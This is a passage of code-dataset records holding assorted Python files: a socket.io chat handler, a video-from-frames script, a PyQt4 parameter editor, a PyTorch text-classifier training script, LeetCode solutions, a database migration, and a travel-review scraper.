self.log('Nickname: {0}'.format(nickname))\n self.session['nickname'] = nickname\n nicknames = self.session.get('nicknames', None)#WTH is 'nicknames'?!! 
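# (Answering the note above: it appears to be a set of connected users'
# nicknames cached on the session; it is created lazily just below and
# pushed to clients via the 'nicknames' event.)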
\n if nicknames is None:\n nicknames = set()\n nicknames.add(nickname)\n self.session['nicknames'] = nicknames\n \n self.broadcast_event('announcement', '%s has connected' % nickname)\n self.broadcast_event('nicknames', list(nicknames))\n return True, nickname\n\n def recv_disconnect(self):\n # Remove nickname from the list.\n self.log('Disconnected')\n nickname = self.session.get('nickname')\n if nickname:\n nicknames = self.session.get('nicknames', None)\n if nicknames:\n nicknames.remove(nickname)\n self.session['nicknames'] = nicknames\n self.broadcast_event('announcement', '%s has disconnected' % nickname)\n self.broadcast_event('nicknames', list(self.nicknames))\n self.disconnect(silent=True)\n return True\n\n def on_user_message(self, room, msg):\n self.log('User message: {0}'.format(msg))\n self.emit_to_room(room, 'msg_to_room', self.session['nickname'], msg)\n return True\n","sub_path":"examples/django_chat/chat/sockets.py","file_name":"sockets.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"600836719","text":"import os, glob\n\ndef make_video(outvid, images=None, fps=30, size=None,\n is_color=True, format=\"FMP4\"):\n \"\"\"\n Create a video from a list of images.\n \n @param outvid output video\n @param images list of images to use in the video\n @param fps frame per second\n @param size size of each frame\n @param is_color color\n @param format see http://www.fourcc.org/codecs.php\n @return see http://opencv-python-tutroals.readthedocs.org/en/latest/py_tutorials/py_gui/py_video_display/py_video_display.html\n \"\"\"\n from cv2 import VideoWriter, VideoWriter_fourcc, imread, resize\n fourcc = VideoWriter_fourcc(*format)\n vid = None\n for image in images:\n if not os.path.exists(image):\n raise FileNotFoundError(image)\n img = imread(image)\n if vid is None:\n if size is None:\n size = img.shape[1], img.shape[0]\n vid = VideoWriter(outvid, fourcc, float(fps), size, is_color)\n if size[0] != img.shape[1] and size[1] != img.shape[0]:\n img = resize(img, size)\n vid.write(img)\n vid.release()\n return vid\n\nVIDEO_SAVE_DIR = '/content/videos'\nVIDEO_DIR = '/content/drive'\nimages = list(glob.iglob(os.path.join(VIDEO_SAVE_DIR, '*.*')))\n# Sort the images by name index.\nimages = sorted(images, key=lambda x: float(os.path.split(x)[1][:-3]))\nprint(images)\noutvid = os.path.join(VIDEO_DIR, \"output.mp4\")\nmake_video(outvid, images, fps=25)\nprint(\"Done...!\")\n","sub_path":"frames2vid.py","file_name":"frames2vid.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"45556778","text":"\nfrom __future__ import division\nfrom PyQt4.QtGui import QMainWindow\nfrom PyQt4.QtGui import QApplication\nfrom PyQt4.QtGui import QTreeView\nfrom PyQt4.QtGui import QHBoxLayout\nfrom PyQt4.QtGui import QVBoxLayout\nfrom PyQt4.QtGui import QPushButton\nfrom PyQt4.QtGui import QWidget\nfrom PyQt4.QtGui import QStandardItemModel\nfrom PyQt4.QtGui import QSortFilterProxyModel\nfrom PyQt4.QtGui import QStandardItem\nfrom PyQt4.QtGui import QAbstractItemView\nfrom PyQt4.QtGui import QHeaderView\nfrom PyQt4.QtGui import QStyledItemDelegate\nfrom PyQt4.QtGui import QSpinBox\nfrom PyQt4.QtGui import QDoubleSpinBox\nfrom PyQt4.QtGui import QLineEdit\nfrom PyQt4.QtGui import QComboBox\nfrom PyQt4.QtCore import Qt\nfrom PyQt4.QtCore import QSize\nfrom PyQt4.QtCore import QString\nfrom PyQt4.QtCore import QRegExp\nfrom 
PyQt4.QtCore import QModelIndex\n\n\nclass StringEditor(QLineEdit):\n\n def __init__(self, parent=None):\n super(StringEditor, self).__init__(parent)\n\n def setEditorData(self, index):\n value = index.model().data(index, Qt.EditRole).toString()\n self.setText(value)\n\n def setModelData(self, model, index):\n value = self.text()\n model.setData(index, value, Qt.EditRole)\n\n\nclass IntEditor(QSpinBox):\n\n def __init__(self, parent=None, value_min=None, value_max=None):\n super(IntEditor, self).__init__(parent)\n if value_min is not None:\n self.setMinimum(value_min)\n else:\n self.setMinimum(-1e9)\n if value_max is not None:\n self.setMaximum(value_max)\n else:\n self.setMaximum(1e9)\n\n def setEditorData(self, index):\n value = index.model().data(index, Qt.EditRole).toInt()\n self.setValue(value[0])\n\n def setModelData(self, model, index):\n self.interpretText()\n value = self.value()\n model.setData(index, value, Qt.EditRole)\n\n\nclass FloatEditor(QDoubleSpinBox):\n\n def __init__(self, parent=None, value_min=None, value_max=None):\n super(FloatEditor, self).__init__(parent)\n if value_min is not None:\n self.setMinimum(value_min)\n else:\n self.setMinimum(-1e9)\n if value_max is not None:\n self.setMaximum(value_max)\n else:\n self.setMaximum(1e9)\n self.setDecimals(2)\n\n def setEditorData(self, index):\n value = index.model().data(index, Qt.EditRole).toFloat()\n self.setValue(value[0])\n\n def setModelData(self, model, index):\n self.interpretText()\n value = self.value()\n model.setData(index, value, Qt.EditRole)\n\n\nclass ChoiceEditor(QComboBox):\n\n def __init__(self, parent=None, choices=None):\n super(ChoiceEditor, self).__init__(parent)\n if choices is not None:\n for choice in choices:\n self.addItem(choice)\n\n def setEditorData(self, index):\n value = index.model().data(index, Qt.EditRole).toString()\n self.setCurrentIndex(self.findText(value))\n\n def setModelData(self, model, index):\n value = self.currentText()\n model.setData(index, value, Qt.EditRole)\n\n\nclass BoolEditor(QComboBox):\n\n def __init__(self, parent=None):\n super(BoolEditor, self).__init__(parent)\n self.addItem(\"False\")\n self.addItem(\"True\")\n\n def setEditorData(self, index):\n value = index.model().data(index, Qt.EditRole).toString()\n self.setCurrentIndex(self.findText(value))\n\n def setModelData(self, model, index):\n value = self.currentText()\n model.setData(index, value, Qt.EditRole)\n\n\nclass ParameterItemDelegate(QStyledItemDelegate):\n\n def __init__(self, parent=None):\n\n super(ParameterItemDelegate, self).__init__(parent)\n\n def createEditor(self, parent, option, index):\n parameter = index.model().data(index, Qt.UserRole+1).toPyObject()\n dtype = parameter.type\n ptype = dtype.phil_type\n if ptype == 'str':\n editor = StringEditor(parent)\n elif ptype == 'float':\n editor = FloatEditor(parent, dtype.value_min, dtype.value_max)\n elif ptype == 'int':\n editor = IntEditor(parent, dtype.value_min, dtype.value_max)\n elif ptype == 'choice':\n def strip(w):\n w = str(w)\n if w.startswith(\"*\"):\n return w[1:]\n return w\n choices = [strip(w) for w in parameter.words]\n editor = ChoiceEditor(parent, choices)\n elif ptype == 'bool':\n editor = BoolEditor(parent)\n else:\n raise RuntimeError(\"Handle type %s\" % dtype)\n return editor\n\n def setEditorData(self, editor, index):\n editor.setEditorData(index)\n\n def setModelData(self, editor, model, index):\n editor.setModelData(model, index)\n\n def updateEditorGeometry(self, editor, option, index):\n 
editor.setGeometry(option.rect)\n\n def sizeHint(self, option, index):\n size = super(ParameterItemDelegate, self).sizeHint(option, index)\n size.setWidth(size.width() * 1.5)\n size.setHeight(size.height() * 2)\n return size\n\n\nclass ParameterItemModel(QStandardItemModel):\n\n def __init__(self, parameters=None):\n super(ParameterItemModel, self).__init__()\n self.setParameters(parameters)\n\n def setParameters(self, parameters):\n\n # Save the parameters\n self.parameters = parameters\n\n # Clear the model\n self.clear()\n\n # Traverse the parameter tree and add to the tree view widget\n def add_parameters(root, parameter):\n if parameter.is_scope:\n name_node = QStandardItem(parameter.name)\n name_node.setFlags(Qt.NoItemFlags | Qt.ItemIsEnabled)\n name_node.setData(parameter, Qt.UserRole + 1)\n for obj in parameter.objects:\n add_parameters(name_node, obj)\n root.appendRow(name_node)\n elif parameter.is_definition:\n name_node = QStandardItem(parameter.name)\n name_node.setFlags(Qt.NoItemFlags | Qt.ItemIsEnabled)\n name_node.setData(parameter, Qt.UserRole + 1)\n value_node = QStandardItem(str(parameter.extract()))\n value_node.setData(parameter, Qt.UserRole + 1)\n root.appendRow([name_node, value_node])\n else:\n raise RuntimeError('Handle This!')\n\n # Populate the tree\n if parameters is not None:\n for obj in parameters.objects:\n add_parameters(self, obj)\n\n def getParameters(self):\n return self.parameters\n\n def data(self, index, role=Qt.DisplayRole):\n if role == Qt.ToolTipRole:\n parameter = index.model().data(index, Qt.UserRole+1).toPyObject()\n if parameter is None:\n return \"\"\n return str(parameter.help)\n return super(ParameterItemModel, self).data(index, role)\n\n\nclass ParameterSortFilterProxyModel(QSortFilterProxyModel):\n\n def __init__(self, parent=None):\n\n super(ParameterSortFilterProxyModel, self).__init__(parent)\n self.setFilterKeyColumn(0)\n\n self.expert_level = 0\n self.search_string = ''\n self.string_filter_cache = {}\n\n def setExpertLevel(self, level):\n self.expert_level = level\n self.invalidateFilter()\n\n def setSearchString(self, text):\n self.search_string = text\n self.invalidateFilter()\n\n def invalidateFilter(self):\n\n # Empty the string filter cache\n self.string_filter_cache = {}\n\n # Get the model\n model = self.sourceModel()\n\n # Recursive function to traverse the tree of nodes.\n # If a child matches the search string, keep the parent\n def update_string_filter_cache(model, parent):\n show_parent = False\n for row in range(model.rowCount(parent)):\n index = model.index(row, 0, parent)\n parameter = model.data(index, Qt.UserRole+1).toPyObject()\n name = parameter.full_path()\n if model.hasChildren(index):\n show = update_string_filter_cache(model, index)\n else:\n show = str(self.search_string) in name\n self.string_filter_cache[name] = show\n show_parent = show_parent or show\n return show_parent\n\n # Update the string filter cache\n update_string_filter_cache(model, QModelIndex())\n\n # Call the parent method\n super(ParameterSortFilterProxyModel, self).invalidateFilter()\n\n def filterAcceptsRow(self, row, parent):\n\n # Get the index\n index = self.sourceModel().index(row, 0, parent)\n\n # Get the parameter\n parameter = index.model().data(index, Qt.UserRole+1).toPyObject()\n\n # Get the expert level\n expert = parameter.expert_level\n if expert is None:\n expert = 0\n\n # Check the expert level\n if self.expert_level == 0 and expert > 0:\n return False\n\n # Check the string filter cache\n if 
self.string_filter_cache[parameter.full_path()] == False:\n return False\n\n # Otherwise OK\n return True\n\n\nclass ParameterTreeView(QTreeView):\n\n def __init__(self, parent=None):\n\n super(ParameterTreeView, self).__init__(parent)\n self.setItemDelegate(ParameterItemDelegate())\n self.setAlternatingRowColors(True)\n self.setSortingEnabled(False)\n self.setHeaderHidden(True)\n self.setAnimated(True)\n self.setSelectionBehavior(QAbstractItemView.SelectItems)\n self.setEditTriggers(QAbstractItemView.AllEditTriggers)\n self.setIndentation(30)\n\n\nclass ParameterTreeWidget(QWidget):\n\n def __init__(self, parent=None, parameters=None):\n\n # Init the parent\n super(ParameterTreeWidget, self).__init__(parent)\n\n # Create the model\n model = ParameterItemModel(parameters)\n\n # Create a parameter tree\n self.tree = ParameterTreeView()\n\n # Create the filter model\n filter_model = ParameterSortFilterProxyModel()\n filter_model.setSourceModel(model)\n filter_model.setExpertLevel(0)\n\n # Set the model in the tree\n self.tree.setModel(filter_model)\n\n # Set the header mode\n self.tree.header().setStretchLastSection(True)\n self.tree.header().setResizeMode(0, QHeaderView.ResizeToContents)\n\n # Start everything expanded\n self.tree.expandAll()\n\n # Create the layout\n layout = QVBoxLayout()\n layout.setMargin(0)\n layout.addWidget(self.tree)\n self.setLayout(layout)\n\n def setExpertLevel(self, level):\n self.tree.model().setExpertLevel(level)\n\n def setSearchString(self, text):\n self.tree.model().setSearchString(text)\n\n\nclass ParameterWidget(QWidget):\n\n def __init__(self, parent=None, parameters=None):\n\n super(ParameterWidget, self).__init__(parent)\n\n # Create the parameter window widget\n self.params = ParameterTreeWidget(None, parameters)\n\n # Create the search widget\n self.search = QLineEdit()\n self.search.setPlaceholderText(\"Search...\")\n self.search.textChanged.connect(self.params.setSearchString)\n\n # Create the expert level widget\n self.expert = QComboBox()\n self.expert.addItem(\"Simple\")\n self.expert.addItem(\"Advanced\")\n self.expert.currentIndexChanged.connect(self.params.setExpertLevel)\n\n # Layout the controls\n control_layout = QHBoxLayout()\n control_layout.addWidget(self.expert)\n control_layout.addWidget(self.search)\n\n # Create the widget layout\n main_layout = QVBoxLayout()\n main_layout.addLayout(control_layout)\n main_layout.addWidget(self.params)\n self.setLayout(main_layout)\n\n def setParameters(self, parameters):\n self.params.setParameters(parameters)\n\n def setExpertLevel(self, level):\n self.params.setExpertLevel(level)\n\n\nclass IntegrateParameterWidget(ParameterWidget):\n\n def __init__(self, parent=None):\n from dials.command_line.integrate import phil_scope\n\n # Init parent\n super(IntegrateParameterWidget, self).__init__(parent, phil_scope)\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self, parent=None):\n\n # Call the parent constructor\n super(MainWindow, self).__init__(parent)\n\n # Create the parameter window widget\n params = IntegrateParameterWidget()\n\n # Create the window layout\n layout = QVBoxLayout()\n layout.addWidget(params)\n\n # Setup the window contents\n window = QWidget()\n window.setLayout(layout)\n self.setCentralWidget(window)\n\n\nif __name__ == '__main__':\n import sys\n\n # Create the application\n app = QApplication(sys.argv)\n\n # Create the main window\n window = MainWindow()\n window.resize(800, 600)\n window.show()\n\n # Execute the application\n 
sys.exit(app.exec_())\n\n\n\n\n\n","sub_path":"lui_testing/PyQt4_toys/JMP_phil_par_test/phil_param_gui_vanilla.py","file_name":"phil_param_gui_vanilla.py","file_ext":"py","file_size_in_byte":11882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"180426763","text":"import os\nimport argparse\nimport datetime\nimport torch\nimport torchtext.data as data\nimport train_cnn\nimport train_lstm\nimport dataset\nfrom torchtext.vocab import Vectors\nfrom models.model_CNN import CNNText\nfrom models.model_mulit_CNN import MultiCNNText\nfrom models.model_LSTM import LSTM\nfrom models.model_GRU import GRU\nfrom models.model_BiLSTM import BiLSTM\nfrom models.model_CNN_LSTM import CNN_LSTM\nfrom models.model_BiGRU import BiGRU\n\n\ncache = '.vector_cache'\ndef parser_set():\n    # command line argument parsing\n    # every argument passed in is processed accordingly\n    # e.g. python main.py -lr 0.01 sets the learning rate to 0.01\n    parser = argparse.ArgumentParser(description='CNN sentence classifier')\n\n    # training-related parameters\n    parser.add_argument('-lr', type=float, default=0.001, help='initial learning rate [default: 0.001]')\n    parser.add_argument('-epochs', type=int, default=256, help='total number of training epochs [default: 256]')\n    parser.add_argument('-batch-size', type=int, default=64, help='number of samples per batch during training [default: 64]')\n    parser.add_argument('-log-interval', type=int, default=1, help='how many iterations between training logs [default: 1]')\n    parser.add_argument('-test-interval', type=int, default=100, help='how many iterations between evaluations [default: 100]')\n    parser.add_argument('-save-interval', type=int, default=500, help='how many iterations between checkpoints [default:500]')\n    parser.add_argument('-save-dir', type=str, default='snapshot', help='where to save snapshots')\n    parser.add_argument('-early-stop', type=int, default=1000, help='stop after this many iterations without improvement')\n    parser.add_argument('-save-best', type=bool, default=True, help='whether to save the model at its best score')\n    # data\n    parser.add_argument('-shuffle', action='store_true', default=False, help='whether to shuffle the data every epoch')\n    # model\n    parser.add_argument('-dropout', type=float, default=0.5, help='dropout probability [default: 0.5]')\n    parser.add_argument('-max-norm', type=float, default=3.0, help='L2 regularization [default: 3.0]')\n    parser.add_argument('-embed-dim', type=int, default=300, help='Glove word vector dimension [default: 300]')\n    parser.add_argument('-kernel-num', type=int, default=100, help='number of kernels per kernel size')\n    parser.add_argument('-kernel-sizes', type=str, default='3,4,5', help='kernel sizes, three kinds')\n    parser.add_argument('-static', action='store_true', default=False, help='whether to modify the word vectors')\n    # device\n    parser.add_argument('-device', type=int, default=-1, help='device for data iteration, -1 means CPU [default: -1]')\n    parser.add_argument('-no-cuda', action='store_true', default=False, help='do not use the GPU')\n    # option\n    parser.add_argument('-snapshot', type=str, default=None, help='filename of a model snapshot [default: None]')\n    # when run from the terminal, if -train is not passed, train keeps its default value: False\n    # if -train is passed, no True/False is needed and train becomes True at runtime\n    parser.add_argument('-train', action='store_true', default=False, help='train the model')\n    parser.add_argument('-test', action='store_true', default=False, help='whether to test')\n    parser.add_argument('-predict', type=str, default=None, help='predict the given sentence')\n    parser.add_argument('-embed-type', type=str, default='rand', help='which embedding to use, random by default')\n    parser.add_argument('-model-type', type=str, default='CNN', help='which model to use, CNN by default')\n    args = parser.parse_args()\n    return args\n\n\ndef update_parser_set():\n    # the vocabulary size is exactly the rows V of the embedding matrix (V*D); the dimension D can be chosen freely\n    args.embed_dropout = 0.5\n    args.lstm_hidden_dim = 300\n    args.lstm_num_layers = 1\n    args.lstm_weight_init = True\n    args.lstm_weight_init_value = 2.0\n    print(\"update_parser_set\")\n    args.embed_num = len(args.text_field.vocab)\n    args.class_num = len(args.label_field.vocab)\n    args.cuda = (not args.no_cuda) and torch.cuda.is_available();del args.no_cuda\n    # split kernel_sizes into a list\n    args.kernel_sizes = [int(k) for k in args.kernel_sizes.split(',')]\n    args.save_dir = os.path.join(args.save_dir, datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))\n\n\ndef mr_multi(text_field, label_field, static_text_field, static_label_field, **kwargs):\n    # fetch the data\n    train_data, dev_data = dataset.MR.splits(text_field, label_field)\n    static_train_data, static_dev_data = dataset.MR.splits(static_text_field, static_label_field)\n    # build the vocabulary\n    text_field.build_vocab(train_data, dev_data)\n    label_field.build_vocab(train_data, dev_data)\n    # build the vocabulary with pretrained word vectors\n    if not os.path.exists(cache):\n        print(\"Directory does not exist, creating it\")\n        os.mkdir(cache)\n    vectors = Vectors(name='.vector_cache/glove.6B/glove.6B.300d.txt', cache=cache)\n    static_text_field.build_vocab(static_train_data, static_dev_data, vectors=vectors)\n    static_label_field.build_vocab(static_train_data, static_dev_data)\n    # load the pretrained vector weights\n    args.static_weight_matrix = static_text_field.vocab.vectors\n    # create an iterator that loads batches from the dataset\n    # create iterators that yield batches for each dataset split\n    train_iter, dev_iter = data.Iterator.splits(\n        (train_data, dev_data),\n        batch_sizes=(args.batch_size, len(dev_data)),\n        **kwargs)\n    return train_iter, dev_iter\n\n\n# load the MR dataset\ndef mr(text_field, label_field, **kwargs):\n    # use the hand-written dataset module for MR\n    train_data, dev_data = dataset.MR.splits(text_field, label_field)\n    if args.embed_type == 'rand':\n        print(\"using random embedding\")\n        text_field.build_vocab(train_data, dev_data)\n        label_field.build_vocab(train_data, dev_data)\n    elif args.embed_type == 'static':\n        print(\"using static external embedding\")\n        if not os.path.exists(cache):\n            print(\"Directory does not exist, creating it\")\n            os.mkdir(cache)\n        vectors = Vectors(name='.vector_cache/glove.6B/glove.6B.300d.txt', cache=cache)\n        text_field.build_vocab(train_data, dev_data, vectors=vectors)\n        label_field.build_vocab(train_data, dev_data)\n        args.weight_matrix = text_field.vocab.vectors\n    elif args.embed_type == 'not-static':\n        print(\"using non-static external embedding\")\n        if not os.path.exists(cache):\n            print(\"Directory does not exist, creating it\")\n            os.mkdir(cache)\n        vectors = Vectors(name='.vector_cache/glove.6B/glove.6B.300d.txt', cache=cache)\n        text_field.build_vocab(train_data, dev_data, vectors=vectors)\n        label_field.build_vocab(train_data, dev_data)\n        args.weight_matrix = text_field.vocab.vectors\n\n    # create an iterator that loads batches from the dataset\n    # create iterators that yield batches for each dataset split\n    train_iter, dev_iter = data.Iterator.splits(\n        (train_data, dev_data),\n        batch_sizes=(args.batch_size, len(dev_data)),\n        **kwargs)\n    # train_iter: 150 batches, 9596/64=150\n    # dev_iter: 1 batch\n    return train_iter, dev_iter\n\n\ndef define_dict():\n    \"\"\"\n    torchtext is used, so fields have to be defined\n    :return:\n    \"\"\"\n    # first define how fields are processed, including common text-processing options\n    # lower: whether to lowercase the data\n    # sequential: whether to represent the data as a sequence; if False, tokenisation cannot be used\n    args.text_field = data.Field(lower=True)\n    args.label_field = data.Field(sequential=False)\n    args.static_text_field = data.Field(lower=True)\n    args.static_label_field = data.Field(sequential=False)\n    print(\"fields defined\")\n\ndef load_data(set_model, train):\n    if args.model_type == 'CNN':\n        print(\"using CNN-mode dataset\")\n        # load the MR dataset, passing the text field and label field; device set to CPU\n        train_iter, dev_iter = mr(args.text_field, args.label_field, device=-1, repeat=False)\n    elif args.model_type == 'CNN_multi':\n        print(\"using CNN_multi-mode dataset\")\n        train_iter, dev_iter = mr_multi(args.text_field, args.label_field, args.static_text_field,\n                                        args.static_label_field, device=-1, repeat=False)\n    elif args.model_type == 'LSTM':\n        print(\"using lstm-mode dataset\")\n        train_iter, dev_iter = mr(args.text_field, args.label_field, device=-1, repeat=False)\n    elif args.model_type == 'BILSTM':\n        print(\"using BILSTM-mode dataset\")\n        train_iter, dev_iter = mr(args.text_field, args.label_field, device=-1, repeat=False)\n    elif args.model_type == 'GRU':\n        print(\"using GRU-mode dataset\")\n        train_iter, dev_iter = mr(args.text_field, args.label_field, device=-1, repeat=False)\n    elif args.model_type == 'BIGRU':\n        print(\"using BIGRU-mode dataset\")\n        train_iter, dev_iter = mr(args.text_field, args.label_field, device=-1, repeat=False)\n    elif args.model_type == 'CNN_LSTM':\n        print(\"using CNN_LSTM-mode dataset\")\n        train_iter, dev_iter = mr(args.text_field, args.label_field, device=-1, repeat=False)\n\n    # update the parameters and print them\n    update_parser_set()\n    print(\"\\n Parameter settings:\")\n    for attr, value in sorted(args.__dict__.items()):\n        print(\"\\t{}={}\".format(attr.upper(), value))\n\n    # build the model instance\n    if args.model_type == 'CNN':\n        set_model = CNNText(args)\n        train = train_cnn.train(train_iter, dev_iter, set_model, args)\n    elif args.model_type == 'CNN_multi':\n        set_model = MultiCNNText(args)\n        train = train_cnn.train(train_iter, dev_iter, set_model, args)\n    elif args.model_type == 'LSTM':\n        set_model = LSTM(args)\n        train = train_lstm.train(train_iter, dev_iter, set_model, args)\n    elif args.model_type == 'GRU':\n        set_model = GRU(args)\n        train = train_lstm.train(train_iter, dev_iter, set_model, args)\n    elif args.model_type == 'BILSTM':\n        set_model = BiLSTM(args)\n        train = train_lstm.train(train_iter, dev_iter, set_model, args)\n    elif args.model_type == 'BIGRU':\n        set_model = BiGRU(args)\n        train = train_lstm.train(train_iter, dev_iter, set_model, args)\n    elif args.model_type == 'CNN_LSTM':\n        set_model = CNN_LSTM(args)\n        train = train_lstm.train(train_iter, dev_iter, set_model, args)\n    return train_iter, dev_iter\n\n\n# program entry point\nif __name__ == '__main__':\n    # set up the arguments\n    args = parser_set()\n    # define the fields\n    define_dict()\n    # load the dataset\n    print(\"loading dataset...\")\n\n    set_model = None\n    train = None\n    train_iter, dev_iter = load_data(set_model, train)\n\n    # if cuda is available, run the model on cuda\n    if args.cuda:\n        torch.cuda.set_device(args.device)\n        set_model = set_model.cuda()\n\n    # train and test the model\n    # if a predict command is given, run prediction\n    if args.predict is not None:\n        print(\"loading model\")\n        f = open(\"best_model.txt\", 'r')\n        args.snapshot = f.readline()\n        f.close()\n        print(\"starting prediction\")\n        if args.model_type == 'lstm':\n            set_model.load_state_dict(torch.load(args.snapshot))\n            label = train_lstm.predict(args.predict, set_model, args.text_field, args.label_field, False)\n            print('\\n[Text] {}\\n[label] {}\\n'.format(args.predict, label))\n        else:\n            set_model.load_state_dict(torch.load(args.snapshot))\n            label = train_cnn.predict(args.predict, set_model, args.text_field, args.label_field, False)\n            print('\\n[Text] {}\\n[label] {}\\n'.format(args.predict, label))\n    # if a test command is given, run testing\n    elif args.test:\n        try:\n            train_cnn.eval(test_iter, set_model, args)\n        except Exception as e:\n            print(\"\\nTest set does not exist.\\n\")\n    # otherwise train\n    elif args.train:\n        print(\"starting training\")\n        try:\n            train(train_iter, dev_iter, set_model, args)\n        except KeyboardInterrupt:\n            print('\\n' + '-' * 89)\n            print('Exiting')\n    else:\n        print(\"Please enter the operation to run: -train -test -predict=str etc.\")\n","sub_path":"CNN_Classificaion_all_models/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"140889496","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n    def __init__(self, val):\n        self.val = val\n        self.left,
self.right = None, None\n\"\"\"\nimport sys\nsys.path.append('/home/paxos/Leetcode/Lpy3/')\nfrom lintclass.graph import TreeBuilder, TreeNode\n\n\nclass Solution:\n \"\"\"\n @param root: the given BST\n @param p: the given node\n @return: the in-order predecessor of the given node in the BST\n \"\"\"\n def inorderPredecessor(self, root, p):\n # write your code here\n pre = None\n\n while root:\n if root.val >= p.val:\n root = root.left\n else:\n pre = root\n root = root.right\n return pre\n\n\ndef main():\n seri = \"{2,0,4,#,1,3,5}\"\n # seri = \"{1,#,2}\"\n tb = TreeBuilder()\n root = tb.deserialize(seri)\n sol = Solution()\n ans = sol.inorderPredecessor(root, root)\n print(ans)\n\n\nmain()\n","sub_path":"lint-915-inorder-predecessor-in-bst/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"323137535","text":"#\n# @lc app=leetcode id=387 lang=python3\n#\n# [387] First Unique Character in a String\n#\n\n# @lc code=start\nclass Solution:\n def firstUniqChar(self, s: str) -> int:\n wro = set()\n for i in range(0, len(s)):\n if(s[i] not in s[i+1:] and s[i] not in wro):\n return i\n else:\n wro.add(s[i])\n return -1\n\n# @lc code=end\nprint(Solution().firstUniqChar(\"cc\"))\n","sub_path":"heregreat/python/387.first-unique-character-in-a-string.py","file_name":"387.first-unique-character-in-a-string.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"247775415","text":"\"\"\"empty message\n\nRevision ID: 0e215ebb9c6f\nRevises: 48ead5f04096\nCreate Date: 2021-01-15 00:45:39.750110\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '0e215ebb9c6f'\ndown_revision = '48ead5f04096'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('projects_importance',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('project_id', sa.Integer(), nullable=False),\n sa.Column('service', sa.String(length=50), nullable=False),\n sa.Column('importance', sa.Integer(), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('updated_at', sa.DateTime(), nullable=False),\n sa.CheckConstraint('updated_at >= created_at'),\n sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('projects_importance')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/0e215ebb9c6f_.py","file_name":"0e215ebb9c6f_.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"16314826","text":"import sys\nimport requests\nimport json\n\nbaseurl = 'http://mobileapi.dom.ria.com/request/auto_get_search/';\npayload = {\n\t'with_users': '1',\n\t'currency' : '1',\n\t'rashod_topliva_from' : '0',\n\t'with_photo':1,\n\t'rashod_topliva_to':0.0,\n\t'price_do':8000,\n\t'category_id':1,\n\t'rashod_type_id':65,\n\t's_yers':2004,\n\t'po_yers':2014,\n\t'damage':1,\n\t'marka_id[0]':67,\n\t'engineVolumeTo':0.0,\n\t'engineVolumeFrom':0.0,\n\t'countpage':20,\n\t'order_by':5,\n\t'lang_id':2,\n}\nr = requests.get(baseurl, params=payload)\n\nprint(r.text)","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"249631797","text":"__author__ = 'Rahul G'\nimport urllib.request\nfrom bs4 import BeautifulSoup\n#Beautifulsoup is not only beautiful but extremely powerful :D\nimport sqlite3\nconn=sqlite3.connect('TravelIQReviews')\n\nprimaryURL = \"http://www.holidayiq.com/destinations/\"\nprimaryHTML = urllib.request.urlopen(primaryURL).read()\nsoup = BeautifulSoup(primaryHTML,'html.parser')\nweekendList=soup.find_all(\"ul\", {\"id\" : \"weekend-getaway-list\"})[0].find_all(\"li\")\nstatesUrl=[]\nfor states in weekendList:\n statesUrl.append(states.find_all(\"a\",{})[0].get(\"href\"))\nnamesList=[]\nfor url in statesUrl:\n htmlData = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(htmlData,'html.parser')\n destinations = soup.find_all(\"div\",{\"class\":\"weekend-section-one\"})\n for namesOfDestinations in destinations:\n namesList.append(namesOfDestinations.get(\"data-destination-name\"))\n\nfor place in namesList:\n placeUrl=primaryURL+place\n try:\n htmlData = urllib.request.urlopen(placeUrl).read()\n soup = BeautifulSoup(htmlData,'html.parser')\n reviews=(soup.find_all(\"div\",{\"id\":\"REVIEWS\"}))\n for i in reviews:\n reviewSet = i.find_all(\"div\", {\"class\":\"hotel-view\"})\n for i in reviewSet:\n name=i.find_all(\"li\",{\"class\":\"reviewer-name\"})[0].text\n header=i.find_all(\"a\",{\"class\":\"reviews-tag-line-link\"})[0].text\n review=i.find_all(\"blockquote\",{\"class\":\"margin0 review_datail_height\"})[0].text\n #print(place,names,header,review,'\\n')\n conn.execute(\"INSERT INTO Reviews (place,name,heading,review) VALUES(?,?,?,?)\" ,(place,name,header,review))\n conn.commit()\n except:\n print(place)\n pass\nconn.close()\n\n\n","sub_path":"HolidayIQALLReviews.py","file_name":"HolidayIQALLReviews.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"264290444","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\nfrom sklearn import metrics\nimport seaborn as sns\nimport statsmodels.api as sm\nimport pandas as pd\n\n#%% Useful functions\n\ndef 